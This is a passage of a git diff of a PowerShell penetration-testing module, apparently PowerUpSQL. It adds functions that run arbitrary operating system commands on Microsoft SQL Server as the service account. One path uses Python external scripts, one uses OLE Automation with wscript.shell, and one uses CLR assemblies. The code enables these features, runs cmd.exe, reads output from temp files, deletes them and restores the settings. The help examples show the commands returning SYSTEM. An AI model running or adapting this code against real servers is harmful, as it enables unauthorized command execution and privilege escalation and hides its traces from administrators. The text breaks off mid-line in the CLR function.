if needed + if ($IsExternalScriptsEnabled -eq 1) + { + Write-Verbose -Message "$Instance : External scripts are already enabled." + } + else + { + Write-Verbose -Message "$Instance : External scripts enabled are disabled." + $DisableExternalScripts = 1 + + # Try to enable Ole Automation Procedures + Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',1;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsExternalScriptsEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "external scripts enabled"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsExternalScriptsEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled external scripts." + } + else + { + Write-Verbose -Message "$Instance : Enabling external scripts failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable external scripts.') + + return + } + } + + # Check if the configuration has been change in the run state + if($IsSysadmin -eq 'Yes'){ + $EnabledInRunValue = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name LIKE 'external scripts enabled'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -ExpandProperty value_in_use + } + if($Database){ + $EnabledInRunValue = Get-SQLQuery -Instance $Instance -Query "SELECT value_in_use FROM master.sys.configurations WHERE name LIKE 'external scripts enabled'" -Username $Username -Password $Password -Database $Database -Credential $Credential -SuppressVerbose | Select-Object -ExpandProperty value_in_use + } + if($EnabledInRunValue -eq 0){ + Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is not enabled in runtime." + Write-Verbose -Message "$Instance : - The SQL Server service will need to be manually restarted for the change to take effect." + Write-Verbose -Message "$Instance : - Not recommended unless you're the DBA." + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'External scripts not enabled in runtime.') + return + }else{ + Write-Verbose -Message "$Instance : The 'external scripts enabled' setting is enabled in runtime.'" + } + + # Setup query to run command + write-verbose "$instance : Executing command: $Command" + $QueryCmdExecute = +@" +EXEC sp_execute_external_script + @language =N'Python', + @script=N' +import subprocess +p = subprocess.Popen(`"cmd.exe /c $Command`", stdout=subprocess.PIPE) +OutputDataSet = pandas.DataFrame([str(p.stdout.read(), `"utf-8`")])' +WITH RESULT SETS (([Output] nvarchar(max))) +"@ + + # Execute query + if($IsSysadmin -eq 'Yes'){ + $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryCmdExecute -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | select Output -ExpandProperty Output + } + if($Database){ + $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryCmdExecute -Username $Username -Password $Password -Database $Database -Credential $Credential -SuppressVerbose | select Output -ExpandProperty Output + } + # Display results or add to final results table + if($RawResults) + { + $CmdResults + } + else + { + $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.trim()) + } + + # Restore external scripts state if needed + if($DisableExternalScripts -eq 1) + { + Write-Verbose -Message "$Instance : Disabling external scripts" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'external scripts enabled',0;RECONFIGURE WITH OVERRIDE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Restore Show Advanced Options state if needed + if($DisableShowAdvancedOptions -eq 1) + { + Write-Verbose -Message "$Instance : Disabling Show Advanced Options" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblResults + } +} + + +# ---------------------------------- +# Invoke-SQLOSCmdOle +# ---------------------------------- # Author: Scott Sutherland -Function Get-SQLDatabaseThreaded +# Reference: https://technet.microsoft.com/en-us/library/ee156605.aspx +# Reference: https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option +Function Invoke-SQLOSCmdOle { <# .SYNOPSIS - Returns database information from target SQL Servers. + Execute command on the operating system as the SQL Server service account using OLE automation procedures. + Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -2038,37 +2409,54 @@ Function Get-SQLDatabaseThreaded SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER NoDefaults - Only select non default databases. - .PARAMETER HasAccess - Only select databases the current user has access to. - .PARAMETER SysAdminOnly - Only select databases owned by a sysadmin. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads - Number of concurrent host threads. + Number of concurrent threads. + .PARAMETER Command + Operating command to be executed on the SQL Server. + .PARAMETER RawResults + Just show the raw results without the computer or instance name. .EXAMPLE - PS C:\> Get-SQLDatabaseThreaded -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb + PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdOle -Verbose -Command "whoami" + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04 : Connection Failed. + VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. + VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : OLE Automation Procedues are already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. + VERBOSE: Closing the runspace pool + + ComputerName Instance CommandResults + ------------ -------- -------------- + MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system + MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseId : 7 - DatabaseName : testdb - DatabaseOwner : sa - OwnerIsSysadmin : 1 - is_trustworthy_on : True - is_db_chaining_on : False - is_broker_enabled : True - is_encrypted : False - is_read_only : False - create_date : 4/13/2016 4:27:36 PM - recovery_model_desc : FULL - FileName : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf - DbSizeMb : 3.19 - has_dbaccess : 1 .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseThreaded -Verbose + PS C:\> Invoke-SQLOSCmdOle -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Command "whoami" -RawResults + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Show Advanced Options. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Ole Automation Procedures are disabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Enabled Ole Automation Procedures. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Executing command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Reading command output from c:\windows\temp\OlHZP.txt + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Removing file c:\windows\temp\OlHZP.txt + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling 'Ole Automation Procedures + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Disabling Show Advanced Options + + nt authority\system + + VERBOSE: Closing the runspace pool #> [CmdletBinding()] Param( @@ -2086,103 +2474,49 @@ Function Get-SQLDatabaseThreaded [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Database name.')] - [string]$DatabaseName, - - [Parameter(Mandatory = $false, - HelpMessage = 'Only select non default databases.')] - [switch]$NoDefaults, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, - [Parameter(Mandatory = $false, - HelpMessage = 'Only select databases the current user has access to.')] - [switch]$HasAccess, + [Parameter(Mandatory = $true, + HelpMessage = 'OS command to be executed.')] + [String]$Command = "whoami", [Parameter(Mandatory = $false, - HelpMessage = 'Only select databases owned by a sysadmin.')] - [switch]$SysAdminOnly, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] - [int]$Threads = 2, + [int]$Threads = 1, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] - [switch]$SuppressVerbose + [switch]$SuppressVerbose, + + [Parameter(Mandatory = $false, + HelpMessage = 'Just show the raw results without the computer or instance name.')] + [switch]$RawResults ) Begin { - # Create data tables for output + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable - $TblDatabases = New-Object -TypeName System.Data.DataTable - $null = $TblDatabases.Columns.Add('ComputerName') - $null = $TblDatabases.Columns.Add('Instance') - $null = $TblDatabases.Columns.Add('DatabaseId') - $null = $TblDatabases.Columns.Add('DatabaseName') - $null = $TblDatabases.Columns.Add('DatabaseOwner') - $null = $TblDatabases.Columns.Add('OwnerIsSysadmin') - $null = $TblDatabases.Columns.Add('is_trustworthy_on') - $null = $TblDatabases.Columns.Add('is_db_chaining_on') - $null = $TblDatabases.Columns.Add('is_broker_enabled') - $null = $TblDatabases.Columns.Add('is_encrypted') - $null = $TblDatabases.Columns.Add('is_read_only') - $null = $TblDatabases.Columns.Add('create_date') - $null = $TblDatabases.Columns.Add('recovery_model_desc') - $null = $TblDatabases.Columns.Add('FileName') - $null = $TblDatabases.Columns.Add('DbSizeMb') - $null = $TblDatabases.Columns.Add('has_dbaccess') - - # Setup database filter - if($DatabaseName) - { - $DatabaseFilter = " and a.name like '$DatabaseName'" - } - else - { - $DatabaseFilter = '' - } - - # Setup NoDefault filter - if($NoDefaults) - { - $NoDefaultsFilter = " and a.name not in ('master','tempdb','msdb','model')" - } - else - { - $NoDefaultsFilter = '' - } - - # Setup HasAccess filter - if($HasAccess) - { - $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1' - } - else - { - $HasAccessFilter = '' - } + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('CommandResults') - # Setup owner is sysadmin filter - if($SysAdminOnly) - { - $SysAdminOnlyFilter = " and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1" - } - else - { - $SysAdminOnlyFilter = '' - } # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable - # set instance to local host by default if(-not $Instance) { @@ -2211,137 +2545,240 @@ Function Get-SQLDatabaseThreaded { # Define code to be multi-threaded $MyScriptBlock = { - # Set instance $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME } - if($TestConnection) + + # Setup DAC string + if($DAC) { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } - # Check version - $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber - if($SQLVersionFull) + # Attempt connection + try { - $SQLVersionShort = $SQLVersionFull.Split('.')[0] - } + # Open connection + $Connection.Open() - # Base query - $QueryStart = " SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - a.database_id as [DatabaseId], - a.name as [DatabaseName], - SUSER_SNAME(a.owner_sid) as [DatabaseOwner], - IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin], - a.is_trustworthy_on, - a.is_db_chaining_on," + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } - # Version specific columns - if([int]$SQLVersionShort -ge 10) - { - $QueryVerSpec = ' - a.is_broker_enabled, - a.is_encrypted, - a.is_read_only,' - } + # Switch to track Ole Automation Procedures status + $DisableShowAdvancedOptions = 0 + $DisableOle = 0 - # Query end - $QueryEnd = ' - a.create_date, - a.recovery_model_desc, - b.filename as [FileName], - (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) - from sys.master_files where name like a.name) as [DbSizeMb], - HAS_DBACCESS(a.name) as [has_dbaccess] - FROM [sys].[databases] a - INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1' + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - # User defined filters - $Filters = " - $DatabaseFilter - $NoDefaultsFilter - $HasAccessFilter - $SysAdminOnlyFilter - ORDER BY a.database_id" + # Check if OLE Automation Procedures are enabled + if($IsSysadmin -eq 'Yes') + { + Write-Verbose -Message "$Instance : You are a sysadmin." + $IsOleEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + } + else + { + Write-Verbose -Message "$Instance : You are not a sysadmin. This command requires sysadmin privileges." - $Query = "$QueryStart $QueryVerSpec $QueryEnd $Filters" + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'No sysadmin privileges.') + return + } - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Enable show advanced options if needed + if ($IsShowAdvancedEnabled -eq 1) + { + Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." + } + else + { + Write-Verbose -Message "$Instance : Show Advanced Options is disabled." + $DisableShowAdvancedOptions = 1 - # Append results for pipeline items - $TblResults | - ForEach-Object -Process { - # Set version specific values - if([int]$SQLVersionShort -ge 10) + # Try to enable Show Advanced Options + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsShowAdvancedEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Show Advanced Options." + } + else + { + Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Show Advanced Options.') + return + } + } + + # Enable OLE Automation Procedures if needed + if ($IsOleEnabled -eq 1) { - $is_broker_enabled = $_.is_broker_enabled - $is_encrypted = $_.is_encrypted - $is_read_only = $_.is_read_only + Write-Verbose -Message "$Instance : Ole Automation Procedures are already enabled." } else { - $is_broker_enabled = 'NA' - $is_encrypted = 'NA' - $is_read_only = 'NA' + Write-Verbose -Message "$Instance : Ole Automation Procedures are disabled." + $DisableOle = 1 + + # Try to enable Ole Automation Procedures + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Check if configuration change worked + $IsOleEnabled2 = Get-SQLQuery -Instance $Instance -Query 'sp_configure "Ole Automation Procedures"' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value + + if ($IsOleEnabled2 -eq 1) + { + Write-Verbose -Message "$Instance : Enabled Ole Automation Procedures." + } + else + { + Write-Verbose -Message "$Instance : Enabling Ole Automation Procedures failed. Aborting." + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Could not enable Ole Automation Procedures.') + + return + } } - $null = $TblDatabases.Rows.Add( - $_.ComputerName, - $_.Instance, - $_.DatabaseId, - $_.DatabaseName, - $_.DatabaseOwner, - $_.OwnerIsSysadmin, - $_.is_trustworthy_on, - $_.is_db_chaining_on, - $is_broker_enabled, - $is_encrypted, - $is_read_only, - $_.create_date, - $_.recovery_model_desc, - $_.FileName, - $_.DbSizeMb, - $_.has_dbaccess - ) + # Setup output file + $OutputDir = 'c:\windows\temp' + $OutputFile = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) + $OutputPath = "$outputdir\$outputfile.txt" + + # Setup query to run command + write-verbose "$instance : Executing command: $Command" + $QueryCmdExecute = +@" +DECLARE @Shell INT +DECLARE @Output varchar(8000) +EXEC @Output = Sp_oacreate 'wscript.shell', @Shell Output, 5 +EXEC Sp_oamethod @shell, 'run' , null, 'cmd.exe /c "$Command > $OutputPath"' +"@ + # Execute query + $null = Get-SQLQuery -Instance $Instance -Query $QueryCmdExecute -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Setup query for reading command output + write-verbose "$instance : Reading command output from $OutputPath" + $QueryReadCommandOutput = +@" +DECLARE @fso INT +DECLARE @file INT +DECLARE @o int +DECLARE @f int +DECLARE @ret int +DECLARE @FileContents varchar(8000) +EXEC Sp_oacreate 'scripting.filesystemobject' , @fso Output, 5 +EXEC Sp_oamethod @fso, 'opentextfile' , @file Out, '$OutputPath',1 +EXEC sp_oacreate 'scripting.filesystemobject', @o out +EXEC sp_oamethod @o, 'opentextfile', @f out, '$OutputPath', 1 +EXEC @ret = sp_oamethod @f, 'readall', @FileContents out +SELECT @FileContents as output +"@ + # Execute query + $CmdResults = Get-SQLQuery -Instance $Instance -Query $QueryReadCommandOutput -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property output -ExpandProperty output + + # Remove file + write-verbose "$instance : Removing file $OutputPath" + $QueryRemoveFile = +@" +DECLARE @Shell INT +EXEC Sp_oacreate 'wscript.shell' , @shell Output, 5 +EXEC Sp_oamethod @Shell, 'run' , null, 'cmd.exe /c "del $OutputPath"' , '0' , 'true' +"@ + # Run query + $null = Get-SQLQuery -Instance $Instance -Query $QueryRemoveFile -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property output -ExpandProperty output + + # Display results or add to final results table + if($RawResults) + { + $CmdResults | Select output -ExpandProperty output + } + else + { + $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.trim()) + } + + # Restore 'Ole Automation Procedures state if needed + if($DisableOle -eq 1) + { + Write-Verbose -Message "$Instance : Disabling 'Ole Automation Procedures" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Ole Automation Procedures',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Restore Show Advanced Options state if needed + if($DisableShowAdvancedOptions -eq 1) + { + Write-Verbose -Message "$Instance : Disabling Show Advanced Options" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible or Command Failed') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue - return $TblDatabases + return $TblResults } } # ---------------------------------- -# Get-SQLTable +# Invoke-SQLOSCmdCLR # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLTable +# References: This was built of off work done by Lee Christensen (@tifkin_) and Nathan Kirk (@sekirkity). +# Reference: http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/ +# Reference: https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqlpipe.sendresultsrow(v=vs.110).aspx +Function Invoke-SQLOSCmdCLR { <# .SYNOPSIS - Returns table information from target SQL Servers. + Execute command on the operating system as the SQL Server service account using a + generated CLR assembly with CREATE ASSEMBLY and CREATE PROCEDURE. + Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -2350,40 +2787,45 @@ Function Get-SQLTable SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER TableName - Table name to filter for. - .PARAMETER NoDefaults - Filter out results from default databases. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER Command + Operating command to be executed on the SQL Server. + .PARAMETER RawResults + Just show the raw results without the computer or instance name. .EXAMPLE - PS C:\> Get-SQLTable -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - SchemaName : dbo - TableName : NOCList - TableType : BASE TABLE + PS C:\> Get-SQLInstanceLocal | Invoke-SQLOSCmdCLR -Verbose -Command "whoami" + VERBOSE: Creating runspace pool and session states + VERBOSE: MSSQLSRV04 : Connection Failed. + VERBOSE: MSSQLSRV04\BOSCHSQL : Connection Success. + VERBOSE: MSSQLSRV04\BOSCHSQL : You are not a sysadmin. This command requires sysadmin privileges. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : You are a sysadmin. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Show Advanced Options is already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : CLR is already enabled. + VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running command: whoami + VERBOSE: MSSQLSRV04\SQLSERVER2016 : Connection Failed. + VERBOSE: Closing the runspace pool - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - SchemaName : dbo - TableName : tracking - TableType : BASE TABLE - .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLTable -Verbose -NoDefaults + ComputerName Instance CommandResults + ------------ -------- -------------- + MSSQLSRV04 MSSQLSRV04\BOSCHSQL No sysadmin privileges. + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 nt authority\system + MSSQLSRV04 MSSQLSRV04\SQLSERVER2016 Not Accessible #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, @@ -2393,138 +2835,299 @@ Function Get-SQLTable [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Database name.')] - [string]$DatabaseName, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Table name.')] - [string]$TableName, + [Parameter(Mandatory = $true, + HelpMessage = 'OS command to be executed.')] + [String]$Command, [Parameter(Mandatory = $false, - HelpMessage = "Don't select tables from default databases.")] - [switch]$NoDefaults, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, [Parameter(Mandatory = $false, - HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] - [switch]$SuppressVerbose + HelpMessage = 'Number of threads.')] + [int]$Threads = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose, + + [Parameter(Mandatory = $false, + HelpMessage = 'Just show the raw results without the computer or instance name.')] + [switch]$RawResults ) Begin { - $TblTables = New-Object -TypeName System.Data.DataTable + # Setup data table for output + $TblCommands = New-Object -TypeName System.Data.DataTable + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('CommandResults') - # Setup table filter - if($TableName) + + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable + + # set instance to local host by default + if(-not $Instance) { - $TableFilter = " where table_name like '%$TableName%'" + $Instance = $env:COMPUTERNAME } - else + + # Ensure provided instance is processed + if($Instance) { - $TableFilter = '' + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance } Process { - # Note: Tables queried by this function typically require sysadmin or DBO privileges. + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ + } - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + $Instance = $_.Instance - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) + # Default connection to local default instance + if(-not $Instance) { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Grabbing tables from databases below:" + $Instance = $env:COMPUTERNAME } - } - else - { - if( -not $SuppressVerbose) + + # Setup DAC string + if($DAC) { - Write-Verbose -Message "$Instance : Connection Failed." + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } - return - } - # Setup NoDefault filter - if($NoDefaults) - { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose - } - else - { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose - } + # Attempt connection + try + { + # Open connection + $Connection.Open() - # Get tables for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - $DbName" - } + # Switch to track CLR status + $DisableShowAdvancedOptions = 0 + $DisableCLR = 0 - # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - TABLE_CATALOG AS [DatabaseName], - TABLE_SCHEMA AS [SchemaName], - TABLE_NAME as [TableName], - TABLE_TYPE as [TableType] - FROM [$DbName].[INFORMATION_SCHEMA].[TABLES] - $TableFilter - ORDER BY TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME" + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Check if CLR is enabled + if($IsSysadmin -eq 'Yes') + { + Write-Verbose -Message "$Instance : You are a sysadmin." + $IsCLREnabled = Get-SQLQuery 